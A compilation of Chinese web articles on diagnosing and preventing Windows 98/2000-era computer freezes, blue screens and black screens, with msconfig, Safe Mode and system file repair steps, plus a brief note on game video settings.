   启动死机主要包括硬件设备故障、BIOS设置不当、硬盘主引导记录受到损坏、系统分区受到损坏、系统文件受到破坏等。
   Windows 98启动时死机的原因比较复杂，因为Windows 98在系统引导时要经过一个彻底的硬、软件检测过程，其中的任何一个环节都可能引起系统工作不正常。
   （一）安装Windows 98后第一次启动便死机
   系统第一次启动就死机，应从硬件安装或设置方面考虑。可系统引导出现"Start Windows 98"时立即按下F8键，选"Safe mode"（安全模式）启动系统。单击"开始/运行"，在"打开"框中键入"msconfig"，再单击"确定"。然后根据下面不同的情况选择不同的选项卡。
   1、禁止32位磁盘模式存取
   如果硬盘不支持32位存取方式，那么系统会在启动过程中挂起。这时应单击"高级"，选中"强制兼容方式磁盘访问"复选框，并"确定"。系统会提示重新启动计算机，单击"是"确认，重新启动系统。如果计算机正常启动，则说明你的硬盘太陈旧了，不能支持32位存取方式。
   如果系统无法使用"Safe mode"进入安全模式，则可按F8键通过"Command prompt only"项进入DOS状态。当出现DOS提示符后，键入"Win/D:F"来启动Windows 98。如果成功，同样说明系统拒绝采用32位磁盘存取模式来运行Windows 98。
   2、保证基于BIOS的磁盘操作
   如果采用上述方法不能成功，那么Windows 98可能要求使用基于BIOS的磁盘操作系统。可用安全模式启动后，启动msconfig程序，单击"高级"，选中"禁用虚拟HD IRQ"复选框，单击"确定"，再重新启动系统。
   如果系统无法使用"Safe mode"进入安全模式，则可按F8键通过"Command prompt only"项进入DOS状态。当出现DOS提示符后，键入"Win/D:V"。如果启动成功，那么可在system.ini文件中的[386Enh]项目后面加入下列设置：
   VirtualHDirq=0
   3、禁止Windows 98使用ROM断点
   一个ROM断点是PC BIOS中的一个地址，它含有Windows 98从安全模式转换成实模式时所使用的指令。一般情况下，Windows 98在指定地址寻找那些断点指令。但是，如果使用了第三方内存管理程序，需禁止使用ROM断点。可用安全模式启动后，启动Msconfig程序，单击"高级"，选中"禁用系统ROM断点"复选框，单击"确定"，再击"确定"。重新启动计算机，如启动成功，说明系统不能使用ROM断点。
   如果系统无法使用"Safe mode"进入安全模式，则可按F8键通过"Command prompt only"项进入DOS状态。当出现DOS提示符后，键入"Win/D:S"。如果启动成功，那么可在system.ini文件中的[386Enh]项目后面加入下列设置：
   SystemROMBreakPoint=0
   4、禁止Windows 98使用视频卡内存
   系统无法使用视频卡内存也可能引起启动失败，可禁止使用。可用安全模式启动后，启动Msconfig程序，单击"高级"，选中"EMM不包含A000-FFFF"复选框，单击"确定"，再击"确定"。重新启动计算机，如启动成功，说明系统无法使用视频卡内存。
   如果系统无法使用"Safe mode"进入安全模式，则可按F8键通过"Command prompt only"项进入DOS状态。当出现DOS提示符后，键入"Win/D:X"。如果启动成功，那么可在system.ini文件中的[386Enh]项目后面加入下列设置：
   EMMExclude=A000-FFFF
  （二）出现"Starting Windows 98……"信息即死机
   这种故障多是由于Windows 98的DOS启动部分受到损坏。如果有安装Windows 98时创建的启动盘，将此盘插入软驱后重新启动计算机。启动后使用"SYS C:"命令向C盘传送系统即可。如安装时没有创建启动盘，可到其他机器上通过"设置面板/添加删除程序/创建启动盘"来创建启动盘，然后使用"SYS C:"命令向C盘传送系统。要注意，传输的系统版本须与原系统版本一致，否则系统无法启动。
   （三）启动后立即关机
   启动后屏幕却出现"现在可以安全地关闭计算机了"，并立即自动关机。产生该故障的原因是由于Windows 98启动时，对驱动程序装载出错，导致系统认为硬件无法正常工作。可以在系统启动出现"Starting Windows 98……"时按下F8键，利用启动模式中的"Step-by-step confirmation"选项来确认。如果系统运行至"Load all Windows drives"[Enter=Y,ESC=N]，按回车键后出现安全关机信息，则肯定是驱动程序装载出错。
   重新启动系统，进入Windows安全模式（Safe mode），打开Windows/System.ini，检查其中的[boot]项，将每一条装载的驱动程序与C:Windows/System下对应的DRV文件对比，即检查[boot]项后面扩展名为drv的语句的等号右边的驱动程序名是否与Windows/System下对应的drv文件的文件名相一致，若不一致则加以更正：若System.ini所指定的驱动程序丢失或受到破坏，则可从其他机器的Windows 98系统中拷贝过来，如无法拷贝，也可临时在该行前加注解符"；"跳过该行。
   （四）其他启动死机故障
   计算机出现启动故障，除了上面常见的原因之外，还有可能是其他原因造成，我们可以使用Msconfig（系统配置程序）来逐个检查。
   1、Config.sys文件或Autoexec.bat文件中存在冲突
   确定Config.sys文件是否存在问题：运行Msconfig，在"常规"选项卡中，单击"选择性启动"，清除"处理Config.sys文件"以外的其他项目复选框的选钩，单击"确定"，并重新启动计算机。如果计算机无法正常启动或关闭，则说明Config.sys文件中的条目存在问题。可再运行Msconfig，选择"Config.sys"标签，清除Config.sys选项卡中所有不含Windows图标行的选钩，然后只启用某行，单击"确定"，如果计算机的启动和关闭都很正常，再启用另一行，重复以上步骤直至确定故障原因。确定引发问题的条目之后，可通过Msconfig取消或修改该项，也可直接删除或修改Config.sys文件中的此条目。
   检查、调整Autoexec.bat文件的方法和Config.sys相似，不再赘述。
   2、System.ini和Win.ini文件中的条目不正确
   用上面的方法也可以确定System.ini和Win.ini文件中是否存在冲突，并可通过Msconfig取消或修改该项，也可直接修改或删除System.ini文件中的此条目。
   3、自动装载程序有问题，或与启动过程冲突
   运行Msconfig，单击"选择性启动"，取消"装载启动组项目"复选框，单击"确定"，重新启动计算机，如果计算机正常启动或关闭，则问题是自动装载程序出错引起。运行Msconfig，单击"启动"标签，每次启用一个自动装载程序，然后启动或关闭机器看是否正常，以进一步确定故障原因，直至找到故障程序将其删除，或干脆取消所有的自动加载程序。
   4、注册表存在问题
   Windows 98不能正常启动或关机，也可能是系统注册有问题，这时可以通过系统启动菜单中的Command prompt only选项进入DOS状态，然后运行"Regedit"来进行注册表的检查和修改。由于注册表包含了系统大量的软、硬件配置信息，修改不当，甚至会造成系统崩溃，所以使用该方法的用户应该对其有较深入的了解。建议大家平时就做好注册表的备份工作，我们可以运行Regedit后，通过"注册表/导出注册表文件"来备份注册表，也可以直接备份Windows子目录下的"System.dat"和"user.dat"两个文件（隐藏文件），以便出故障时能尽快修复注册表。
   （五）具体情况
    1、出现蓝天白云后，提示缺少某某文件
    解决方法：
   （1）记录下这个文件名和路径；
   （2）插入Windows 98的启动盘，重新启动计算机。选第一种启动方式。由提示进入启动盘建立的虚拟盘，运行虚拟盘上的Ext.exe文件；
   （3）这时出现提示：Please enter the path to the windows CAB files(a:): 此处键入Windows 98安装盘所在的盘符与路径，如：G:Pwin98win98，回车（G为光驱盘符）；
   （4）之后又出现提示：Please enter the name(s) of the file(s) you want to extract:　此处键入启动时显示丢失的系统文件名，并回车；
   （5）再次出现提示：Please enter the path to extract to ("Enter" for current directory): 此处要求键入文件将被释放到的目录，如："C:WindowsSystem"目录，并回车；
   （6）这时，该程序提示你再次确认刚才的路径、文件名和目录：Is this Okay(y/n)? 键入"Y"并回车。该程序搜索Windows 98安装盘的CAB文件包，很快，系统显示：extracting C:windowssystem某某文件。表明所缺的文件已经从安装盘上释放到你的计算机中了。
   （7）重新开机。若报告还有文件缺少，则重复以上的步骤。
    2、出现蓝天白云一会儿死机
    解决方法：
   （1）用杀毒软件进行杀毒，排除病毒作用的可能性。关于上次能正常关机，这次无缘无故不能正常开机，多半病毒作怪。
   （2）重新启动系统，当出现"Start windows 98……"（自检一结束出现蓝天白云之前）时立即按下F8键，利用启动模式中的"Safe mode"（安全模式）进行启动。启动完后正常关机，并选择"重新启动"。如果是属于非正常关机类（如断电等）而引起的故障，这样重新启动后，Windows就会自动进行磁盘扫描，恢复系统文件。
   （3）重新启动到安全模式。进入控制面板，检查各项系统设置。如显示属性：检查屏幕保护文件，背景文件，必要时退出这些文件，检查颜色的设置，屏幕区域的设置，是否正确。如此等等，一项一项检查。如果是属于进行系统设置，更换部件，新装某些软件而引起的故障，一般可以恢复。
   （4）重新启动系统，当出现"Start windows 98……"时立即按下F8键，利用启动模式中的"Step-by-step Confirmation"来确认，系统运行到哪个文件死机，那问题就是出在这个文件上了，这样确认，比上述进入控制面板，一项一项在检查要快些。
   （5）不能进入安全模式，则可以进入"Command prompt only"。键入"WIN/D:F"来启动，成功则说明硬盘太旧了，键入"WIN/D:V"来启动，成功则可以打开System.ini文件，将文件中的[386Enh]项目后面加入下列设置：VirtualDirq=0。键入
    "Win/D:S"来启动，成功则在System.ini文件的[386Enh]项目后面加入下列设置：System ROM Break Point=0。键入
    "Win/D:X"。成功则在system.ini文件中的[386Enh]项目后面加入下列设置：EMMExclude=A000-FFFF。
    （6）若连"Command prompt only"也不能进入，则说明DOS启动文件被破坏了，要利用启动盘来启动，利用"SYS C:"命令，来进行启动文件的传送了。
三、运行时死机
   运行时死机的情况相当复杂，例如，病毒感染后，整个系统出现莫名其妙的错误而死机；Windows 95/98的某些文件被应用软件的相应文件覆盖后死机；修改软件设置后，产生冲突而死机；用户操作不当，如误删除文件、误覆盖文件等；某些应用软件由于编程不规范，也会引起系统冲突而死机。
四、预防死机
   在日常使用电脑的过程中，我们要注意采用如下措施预防或者解决死机问题：
   在插拔硬件设备时，一定要小心、轻巧，防止部件接触不良。
   CPU超频最好不要过高，否则，会在启动时死机或者运行时莫名其妙的死机。
   BIOS设置要恰当，例如，某些内存设置和总线设置不要太优。
   最好配备稳压电源，以免电压不稳而造成运行死机。
   要注意防范病毒。
   要正确开关机，否则会造成系统文件的损坏，而使下次运行时死机或者启动时死机。
   在安装应用软件出现是否覆盖文件的提示时，最好不要覆盖。
   在卸载文件时，不要删除共享文件，某些共享文件可能被系统或者其他程序使用，一旦删除了这些文件，会使应用软件无法启动而死机，或者出现系统运行死机。
   在设置设备时，最好检查有无保留中断号（IRQ），不要让其他设备也使用中断号。
   在加载某些软件时，要注意先后次序。有些软件由于编程的不规范，不能先运行，而应放在最后运行，这样才不会引起系统管理的混乱。
   在运行大型应用软件（如Office 2000）时，不要在运行状态下退出以前运行的程序，否则可能引起整个Windows 98系统的崩溃。
   对于系统文件，最好使用隐含属性，这样才不会因误操作而被删除或覆盖。
   在Windows 95/98中尽量不要运行16位应用程序，有的应用程序在Windows 95/98中运行时会修改系统文件而使系统无法启动。


电脑死机故障分析

《一键清理系统垃圾》

电脑死机故障分析

每个使用过电脑的人恐怕都遇到过死机现象，电脑的死机确实是一件很烦人的事，有时还会给您带来不小的损失，但是这个问题也确实是很复杂的，死机既有可能是硬件上的暇弊，也有可能是软件中的bug，当然还有可能就是您的“非法操作”。下面想就一些实例来具体问题具体分析一番：

   显卡原因
    Q 一台电脑发生经常性的死机现象，启动电脑，会有三声报警声，显示器有时不能点亮，但主机工作正常，在设置成32位色彩后，死机更加频繁。为什么?
    A 造成以上情况死机的原因可能有两个：一个是显示卡散热不好造成的工作不正常，另一个原因是显卡和主板的兼容性不好。在设置成高位色后的死机，很可能是显卡显示功能比较弱，在更高位色的情况下保证不了原来的分辨率，看来这个问题主要是出自显卡上。

   电源原因
    Q 电脑一直使用很好，但最近一段时间偶尔出现启动过程中的死机，并不是每一次都这样，有时候需要两三次才能顺利地启动。为什么?
    A 由于以前使用情况一直很好，一般可以排除是硬件上的兼容性问题，而在启动过程中的死机，屏幕上又没有给出相关的信息，所以也不很像是软件的问题，所以最有可能就是由于电源的老化或者超负荷造成的，一般更换电源检验一下就可以。

   驱动程序原因
    Q 在升级Win 98过程中，出现“按立即启动按钮，计算机将立即重新启动，否则15秒后计算机将自动重新启动。”对话框，但启动后，蓝屏死机。为什么?
    A 由于是在安装系统中的死机，多半是由于硬件设备的冲突造成的，可以先将除显卡以外的其他扩展插卡拔掉，然后再重新安装Win 98，如仍出现上述情况，有可能是Win 98系统对原显卡的驱动程序不兼容造成的，可以在开机时选择进入安全模式，然后在控制面板中升级显卡的驱动程序。

   DOS启动原因
    Q 电脑在启动后出现“Starting Windows 98”信息时，随即死机。为什么?
    A 此种情况下的死机，很可能是由于Win 98的DOS启动部分受到破坏所至，因为此时还尚未进入到Win 98的系统中，解决此问题需要用到Win 98的启动软盘，用启动盘来重新启动电脑后，然后在DOS状态下输入“sys c:”命令，这样可以修复硬盘中的DOS引导系统，问题应该可以解决，但需要注意的是，启动盘必须是用与当前操作系统版本一致的，否则将破坏Windows系统。

   虚拟内存原因
    Q 在Win 9x下运行大型的应用程序时，出现硬盘灯狂闪，随即就死机了。为什么?
    A 这是我们经常会遇到的一种死机情况，这个问题大多是和设置的虚拟内存有关。如果本身的内存就比较小，而又运行了大型的应用程序，这时就需要有较大的虚拟内存，但如果这时的虚拟内存恰恰不够了，就会造成上述的死机了。所以建议您最好是将虚拟内存的容量设置得稍大一点，并且经常删除一些临时的虚拟文件。

   注册表原因
    Q 关于Win 9x注册表损坏而引起的死机现象。怎样解决?
    A Windows系统中的注册表是一个很危险的地方，一般情况下不要修改。出现误删的问题，可以将备份的注册表恢复过来。具体方法是启动电脑到纯DOS状态下，然后进入到Windows的目录下，执行一下命令：
    attrib －h －r －s system.da0
    atttib －h －r －s user.da0
    copy system.da0 system.dat
    copy user.da0 user.dat
    最后重新启动电脑。

   引导程序原因
    Q 电脑在开机自检后，在屏幕上显示“No ROM Basic，System Halted”信息后死机，硬盘等也不再闪烁。为什么?
    A 造成这一故障的原因是硬盘的引导程序破坏或者是受病毒侵害，还有可能是主引导区的最后两个字节“55AAH”被改写，因为这两个字节一旦被改写，那么系统就不再认为有硬盘存在了，所以操作系统也就无法启动了。解决方法是用软盘启动电脑，在DOS状态下，执行“FDISK/MMR"命令，这样就可以使正确的主引导程序和结束标识覆盖在硬盘的主引导区上。

   安装操作系统原因
    Q 在电脑启动时，屏幕上出现了“Error Loading Operation System”的相关信息，然后就死机了。为什么?
    A 以上显示信息的意思是：装载操作系统错误。这是在读取分区引导扇区出错时才提示的。可能是因为：
    1、分区表指示的分区起始地址不正确。
    2、分区引导扇区所在磁道的磁道标志和扇区ID损坏，找不到指定的扇区。
    3、驱动器读电路故障，但这种情况比较少见，多数是随机性读错误，因为系统引导进行到此处，应该说已正确地读出了一个主引导扇区。

    解决上述的问题，需要借助像诺顿的磁盘医生NDD之类的修复软件来回复硬盘的分区表


电脑死机原因大全

《一键清理系统垃圾》

电脑死机原因大全

死机是令操作者颇为烦恼的事情。死机时的表现多为“蓝屏”，无法启动系统，画面“定格”无反应，鼠标、键盘无法输入，软件运行非正常中断等。尽管造成死机的原因很多，但是万变不离其宗，其原因永远也脱离不了硬件与软件两方面。
由硬件原因引起的死机

【散热不良】
显示器、电源和CPU在工作中发热量非常大，因此保持良好的通风状况非常重要，如果显示器过热将会导致色彩、图象失真甚至缩短显示器寿命。工作时间太长也会导致电源或显示器散热不畅而造成电脑死机。CPU的散热是关系到电脑运行的稳定性的重要问题，也是散热故障发生的“重灾区”。

【移动不当】
在电脑移动过程中受到很大振动常常会使机器内部器件松动，从而导致接触不良，引起电脑死机，所以移动电脑时应当避免剧烈振动。

【灰尘杀手】
机器内灰尘过多也会引起死机故障。如软驱磁头或光驱激光头沾染过多灰尘后，会导致读写错误，严重的会引起电脑死机。

【设备不匹配】
如主板主频和CPU主频不匹配，老主板超频时将外频定得太高，可能就不能保证运行的稳定性，因而导致频繁死机。

【软硬件不兼容】
三维软件和一些特殊软件，可能在有的微机上就不能正常启动甚至安装，其中可能就有软硬件兼容方面的问题。

【内存条故障】
主要是内存条松动、虚焊或内存芯片本身质量所致。应根据具体情况排除内存条接触故障，如果是内存条质量存在问题，则需更换内存才能解决问题。

【硬盘故障】
主要是硬盘老化或由于使用不当造成坏道、坏扇区。这样机器在运行时就很容易发生死机。可以用专用工具软件来进行排障处理，如损坏严重则只能更换硬盘了。另外对于在不支持UDMA 66/100的主板，应注意CMOS中硬盘运行方式的设定。

【CPU超频】
超频提高了CPU的工作频率，同时，也可能使其性能变得不稳定。究其原因，CPU在内存中存取数据的速度本来就快于内存与硬盘交换数据的速度，超频使这种矛盾更加突出，加剧了在内存或虚拟内存中找不到所需数据的情况，这样就会出现“异常错误”。解决办法当然也比较简单，就是让CPU回到正常的频率上。

【硬件资源冲突】
是由于声卡或显示卡的设置冲突，引起异常错误。此外，其它设备的中断、DMA或端口出现冲突的话，可能导致少数驱动程序产生异常，以致死机。解决的办法是以“安全模式”启动，在“控制面板”→“系统”→“设备管理”中进行适当调整。对于在驱动程序中产生异常错误的情况，可以修改注册表。选择“运行”，键入“REGEDIT”，进入注册表编辑器，通过选单下的“查找”功能，找到并删除与驱动程序前缀字符串相关的所有“主键”和“键值”，重新启动。

【内存容量不够】
内存容量越大越好，应不小于硬盘容量的0.5～1%，如出现这方面的问题，就应该换上容量尽可能大的内存条。

【劣质零部件】
少数不法商人在给顾客组装兼容机时，使用质量低劣的板卡、内存，有的甚至出售冒牌主板和Remark过的CPU、内存，这样的机器在运行时很不稳定，发生死机在所难免。因此，用户购机时应该警惕，并可以用一些较新的工具软件测试电脑，长时间连续考机（如72小时），以及争取尽量长的保修时间等。

由软件原因引起的死机

【病毒感染】
病毒可以使计算机工作效率急剧下降，造成频繁死机。这时，我们需用杀毒软件如KV300、金山毒霸、瑞星等来进行全面查毒、杀毒，并做到定时升级杀毒软件。

【CMOS设置不当】
该故障现象很普遍，如硬盘参数设置、模式设置、内存参数设置不当从而导致计算机无法启动。如将无ECC功能的内存设置为具有ECC功能，这样就会因内存错误而造成死机。

【系统文件的误删除】
由于Windows 9x启动需要有Command.com、Io.sys、Msdos.sys等文件，如果这些文件遭破坏或被误删除，即使在CMOS中各种硬件设置正确无误也无济于事。解决方法：使用同版本操作系统的启动盘启动计算机，然后键入“SYS C：”，重新传送系统文件即可。

【初始化文件遭破坏】
由于Windows 9x启动需要读取System.ini、Win.ini和注册表文件，如果存在Config.sys、Autoexec.bat文件，这两个文件也会被读取。只要这些文件中存在错误信息都可能出现死机，特别是System.ini、Win.ini、User.dat、System.dat这四个文件尤为重要。

【动态链接库文件（DLL）丢失】
在Windows操作系统中还有一类文件也相当重要，这就是扩展名为DLL的动态链接库文件，这些文件从性质上来讲是属于共享类文件，也就是说，一个DLL文件可能会有多个软件在运行时需要调用它。如果我们在删除一个应用软件的时候，该软件的反安装程序会记录它曾经安装过的文件并准备将其逐一删去，这时候就容易出现被删掉的动态链接库文件同时还会被其它软件用到的情形，如果丢失的链接库文件是比较重要的核心链接文件的话，那么系统就会死机，甚至崩溃。我们可用工具软件如“超级兔仔”对无用的DLL文件进行删除，这样会避免误删除。

【硬盘剩余空间太少或碎片太多】
如果硬盘的剩余空间太少，由于一些应用程序运行需要大量的内存、这样就需要虚拟内存，而虚拟内存则是由硬盘提供的，因此硬盘要有足够的剩余空间以满足虚拟内存的需求。同时用户还要养成定期整理硬盘、清除硬盘中垃圾文件的良好习惯。

【BIOS升级失败】
应备份BIOS以防不测，但如果你的系统需要对BIOS进行升级的话，那么在升级之前最好确定你所使用BIOS版本是否与你的PC相符合。如果BIOS升级不正确或者在升级的过程中出现意外断电，那么你的系统可能无法启动。所以在升级BIOS前千万要搞清楚BIOS的型号。如果你所使用的BIOS升级工具可以对当前BIOS进行备份，那么请把以前的BIOS在磁盘中拷贝一份。同时看系统是否支持BIOS恢复并且还要懂得如何恢复。

【软件升级不当】
大多数人可能认为软件升级是不会有问题的，事实上，在升级过程中都会对其中共享的一些组件也进行升级，但是其它程序可能不支持升级后的组件从而导致各种问题。

【滥用测试版软件】
最好少用软件的测试版，因为测试软件通常带有一些BUG或者在某方面不够稳定，使用后会出现数据丢失的程序错误、死机或者是系统无法启动。

【非法卸载软件】
不要把软件安装所在的目录直接删掉，如果直接删掉的话，注册表以及Windows目录中会有很多垃圾存在，久而久之，系统也会变不稳定而引起死机。

【使用盗版软件】
因为这些软件可能隐藏着病毒，一旦执行，会自动修改你的系统，使系统在运行中出现死机。

【应用软件的缺陷】
这种情况是常见的，如在Win 98中运行那些在DOS或Windows 3．1中运行良好的16位应用软件。Win 98是32位的，尽管它号称兼容，但是有许多地方是无法与16位应用程序协调的。还有一些情况，如在Win 95下正常使用的外设驱动程序，当操作系统升级后，可能会出现问题，使系统死机或不能正常启动。遇到这种情况应该找到外设的新版驱动。

【启动的程序太多】
这使系统资源消耗殆尽，使个别程序需要的数据在内存或虚拟内存中找不到，也会出现异常错误。

【非法操作】
用非法格式或参数非法打开或释放有关程序，也会导致电脑死机。请注意要牢记正确格式和相关参数，不随意打开和释放不熟悉的程序。

【非正常关闭计算机】
不要直接使用机箱中的电源按钮，否则会造成系统文件损坏或丢失，引起自动启动或者运行中死机。对于Windows 98/2000/NT等系统来说，这点非常重要，严重的话，会引起系统崩溃。

【内存中冲突】
有时候运行各种软件都正常，但是却忽然间莫名其妙地死机，重新启动后运行这些应用程序又十分正常，这是一种假死机现象。出现的原因多是Win 98的内存资源冲突。大家知道，应用软件是在内存中运行的，而关闭应用软件后即可释放内存空间。但是有些应用软件由于设计的原因，即使在关闭后也无法彻底释放内存的，当下一软件需要使用这一块内存地址时，就会出现冲突。

   二、计算机“死机”的预防

     1．保证正确的Bios设置。Bios里面的设置一定要合适，错误的Bios设置会使你在运行Windows的时候死机。

     2．经常检查电脑配件接触情况。在板卡接触不良的情况下运行会引起系统死机，因此在更换电脑配件时，一定要使板卡与主机板充分接触。

     3．定期清洁机箱。灰尘太多会使板卡之间接触不良，引起系统在运行中死机，因此机箱要随时清洁，不要让太多的灰尘积存在机箱中。

     4．坚持认真查杀病毒。对来历不明的光盘或软盘，不要轻易使用，对邮件中的附件，要先用杀毒软件检查后再打开。

     5．按正确的操作顺序关机。在应用软件未正常结束运行前，别关闭电源，否则会造成系统文件损坏或丢失，引起在启动或运行中死机。

     6．避免多任务同时进行。在执行磁盘整理或用杀毒软件检查硬盘期间，不要运行其他软件，否则会造成死机。

     7．勿过分求新。各种硬件的驱动不一定要随时更新，因为才开发的驱动程序往往里面有bug，会对系统造成损害，引起系统死机，最新的不一定是最好的。

     8．在卸载软件时，用自带的反安装程序或Windows里面的安装/卸载方式，不要直接删除程序文件夹，因为某些文件可能被其他程序共享，一旦删除这些共享文件，会造成应用软件无法使用而死机。

     9．设置硬件设备时，最好检查有无保留中断（IRQ），不要让其他设备使用该中断号，以免引起中断冲突，造成系统死机。

     10．在上网冲浪的时候，不要打开太多的浏览器窗口，否则会导致系统资源不足，引起系统死机。

     11．如果你的机器内存不是很大，千万不要运行占用内存较大的程序，如Photoshop，否则运行时容易死机。

     12．对于系统文件或重要的文件，最好使用隐含属性，这样才不至于因错误操作删除这些文件，引起系统死机。

     13．修改硬盘主引导记录时，最好先保存原来的记录，防止因修改失败而无法恢复原来的引导记录。

     14．CPU、显卡等配件一般不要超频，若确实需要超，要注意超频后板卡的温度，CPU、显卡等长期在非正常频率和温度下工作轻则自动重启或死机，重者烧毁CPU、显卡、主板。


防止电脑死机二十五招之Win2000篇

《一键清理系统垃圾》

防止电脑死机二十五招之Win2000篇

1、在同一个硬盘上安装太多的操作系统会引起系统死机。

    2、CPU、显示卡等配件不要超频过高，要注意温度，否则，在启动或运行时会莫名其妙地重启或死机。

    3、在更换电脑配件时，一定要插好，因为配件接触不良会引起系统死机。

    4、BIOS设置要恰当，虽然建议将BIOS设置为最优，但所谓最优并不是最好的，有时最优的设置反倒会引起启动或者运行死机。

    5、最好配备稳压电源，以免电压不稳引起死机。

    6、如果有条件的话，加装一个UPS，使电脑在停电后不会造成死机。

    7、对来历不明的软盘和光盘，不要轻易使用，对E－mail中所附的软件，要用KV300、瑞星等杀毒软件检查后再使用，以免传染病毒后，是系统死机。

    8、在应用软件未正常结束时，别关闭电源，否则会造成系统文件损坏或丢失，引起自动启动或者运行中死机。对于Windows98/2000/NT等系统来说，这点非常重要。

    9、在安装应用软件当中，若出现提示对话框“是否覆盖文件”，最好选择不要覆盖。因为通常当前系统文件是最好的，不能根据时间的先后来决定覆盖文件(除非你对文件的时间很在意)。

    10、在卸载软件时，不要删除共享文件，因为某些共享文件可能被系统或者其他程序使用，一旦删除这些文件，会使应用软件无法启动而死机，或者出现系统运行死机。

    11、设置硬件设备时，最好检查有无保留中断号(IRQ)，不要让其他设备使用该中断号，否则引起IRQ冲突，从而引起系统死机。

    12、在加载某些软件时，要注意先后次序，由于有些软件编程不规范，在运行是不能排在第一，而要放在最后运行，这样才不会引起系统管理的混乱。

    13、在运行大型应用软件时(如OFFICE 2000)，不要在运行状态下退出以前运行的程序，否则会引起整个Windows98系统的崩溃。

    14、在内存较小的情况下(如4MB－16MB)，最好不要运行占用内存较大的应用程序，否则在运行时容易出现死机。建议在运行这些程序时应及时保存当前正在使用的文件。 15、对于系统文件或重要文件，最好使用隐含属性，这样才不致于因误操作而删除或者覆盖这些文件。

    16、修改硬盘主引导记录时，最好先保存原来的记录，防止因修改失败而无法恢复原来的硬盘主引导记录。

    17、最好少用软件的测试版，因为测试版在某方面不够稳定，在使用后会使系统无法启动。

    18、在Windows95/98中尽量不要运行16位应用程序，因为16位的应用程序会与Windows中的32位应用程序产生冲突，从而引起死机或无法启动。

    19、在升级BIOS之前，应确定所升级的BIOS版本，同时应先保存一下原先的版本，以免升级错误而使系统无法启动。

    20、尽量不要使用盗版的软件，因为这些软件里隐藏着大量病毒，一旦执行，会自动修改你的系统，使系统在运行中出现死机。

    21、在机箱中，可能蕴藏了大量的灰尘，灰尘若接触了配件的电路，会使系统不稳定或死机。

    22、在执行磁盘碎片整理的时后，不要运行大型应用软件，否则引起死机。

    23、用杀毒软件检查硬盘期间，不要运行其它的应用程序，以防止系统死机。

    24、在上网的时候，不要一次打开太多的浏览窗口，导致资源不足，引起死机。

    25、在关闭计算机的时候，不要直接使用机箱中的电源按钮，因为直接使用电源按钮会引起文件的丢失，使下次不能正常启动，从而造成系统死机。


黑屏的几个原因

《一键清理系统垃圾》

黑屏的几个原因

    (1)显示器断电，或显示器数据线接触不良；
    (2)主板没有供电；
    (3)显卡接触不良或损坏；
    (4)CPU 接触不良；
    (5)内存条接触不良；
    (6)机器感染 CIH 病毒，BIOS 被破坏性刷新。


“蓝屏”的原因及处理方法

《一键清理系统垃圾》

“蓝屏”的原因及处理方法

    在计算机的运行过程中，经常会遇到屏幕变成蓝色，这也就是计算机的蓝屏。造成计算机的屏幕变蓝的原因有很多种，概括起来有以下几种原因。

    一、屏幕显示系统忙，请选择任意键……

    1虚拟内存不足造成系统多任务运算错误

    虚拟内存是Windows系统所特有的一种解决系统资源不足的方法，其一般要求主引导硬盘剩余空间是其物理内存的2～3倍。有的发烧友为了充分利用自己的有限空间，把自己的硬盘塞的满满的，忘记了Windows苛刻的要求，导致虚拟内存因空间不足出现系统运算错误。

    当开机后不久运行程序时出现蓝屏，你若留心会在C盘的根目录下发现有一.swp文件存在,其大约占40～50MB的空间，这是一个为系统提供虚拟内存的程序。即便你给你的硬盘减肥，在DOS下删去它后，待你重新启动的时候，它又会出现在你的面前。这个文件是给你个警告，就是说硬盘空间已经有限导致虚拟内存空间不够，从而把虚拟内存作成一个文件来完成。

    遇到上述情况可以手动配置虚拟内存，选择高级，把虚拟内存的默认地址，转到其他的逻辑盘下，这样或许能解决此问题。

    2CPU超频导致运算错误

    超频对于发烧友来说是常事,所以由超频所引起的各种故障也就在所难免。超频，就其本身而言就是在其原有的基础上完成更高的性能，但由于进行了超载运算，造成其内部运算过多，使CPU过热，从而导致系统运算错误。

    有些CPU的超频性能比较好，Intel的赛扬处理器、AMD－K6处理器还算较好的，但有时也会出现一些莫名其妙的错误（例如：Intel赛扬300A，在超频450时，软驱在没有接受命令时，进行读盘操作）。Intel的低于200的CPU以及AMD－K5的超频能力就不是那么好。建议高档的CPU最好在机箱内挂个大风扇，保证机箱内温度不要过高，超频能力低的处理器就先别超了。

    二、内存条互不兼容或损坏引起运算错误

    这主要在系统启动而没有进入系统时出现，并提示内存调用中断错误，问是否继续。造成这种错误的主要原因是因为内存条的互不兼容，或者有坏了的内存条造成的，若更换了内存条还不能恢复时，只有通过恢复注册表或者更新系统。

    在扩充内存时，由于内存条的芯片组不同，会存在兼容性的问题，SDRAM的内存兼容性还好些，但也要注意外频的统一，EDO的内存条的外频不是很快，而且性能也不是很好，在扩充后容易引起损坏（特指兆数不同或芯片组不同）。

    三、在网络上被“坏人”攻击

    在网络上被“坏人”攻击后，屏幕变蓝并且提示系统中断并要求按任意键……按任意键后网络浏览功能终止，只有重新启动后才能恢复网络功能。在上网的时候，由于自己的IP地址被“黑客”无意发现，被其用一些软件（类似nuke文件）进行攻击，这种情况最好的防御办法是在自己的机器上装上防御软件。在去那些可能暴露身份的站点（如 BBS站，特别是高校的BBS站），应在登录后进行一下安全设置，隐藏自己的IP地址。

    四、光驱在读盘过程中被非正常打开

    当光驱在读取数据时由于误操作等被非正常打开后出现蓝屏。这种情况并不影响系统的运行，只要再弹入光驱，或者按ESC便可轻松解决。

    以上是我所知道的计算机中导致蓝屏的几种原因，或许还会有其他一些莫名其妙的问题导致计算机出现蓝屏。遇到这类问题后，应先仔细分析问题发生的原因，然后再着手解决。

作者：周明章


优化游戏选项

《一键清理系统垃圾》

优化游戏选项

    游戏里的视频选项的选用要慎重呀,
    不是随随便便都打最高的!!!
    我来顺着讲啊:

    伽马值:没什么关系,调亮度的,不管它了.

    分辨率: 老兄,你省着点吧,不要1024了,这是魔兽不是反恐哦.还是老老实实的用800*600吧,为什么呢?
    暴雪公司本就是在800 600的标准上开发的这个,1024图像没多少实质的改变.

    特征细节:是人物的结构三角型的数量,比如说英难的三角特征都较复杂,如果你的机子在混战中停机还是
    不要选最高,中就可以了,不过为了画面问题,选用高还是好的,事实魔兽的三角并不多....

    动画质量:这可不是说的放动画电影的质量哦,是指每一个人物角色在没有被操作时的一些闲余动作,
    比如:恶魔猎人的双臂展开,单脚站立的样子......所以,你如果只是为了乐趣,就用高吧,动作会很多且
    频繁,到了战网上时,你再将这个取消为低,有利流畅的进行紧张对战...你也没时间去欣赏的.
    优化方案便是....
    单机游戏时:设高
    网络对战时:设低

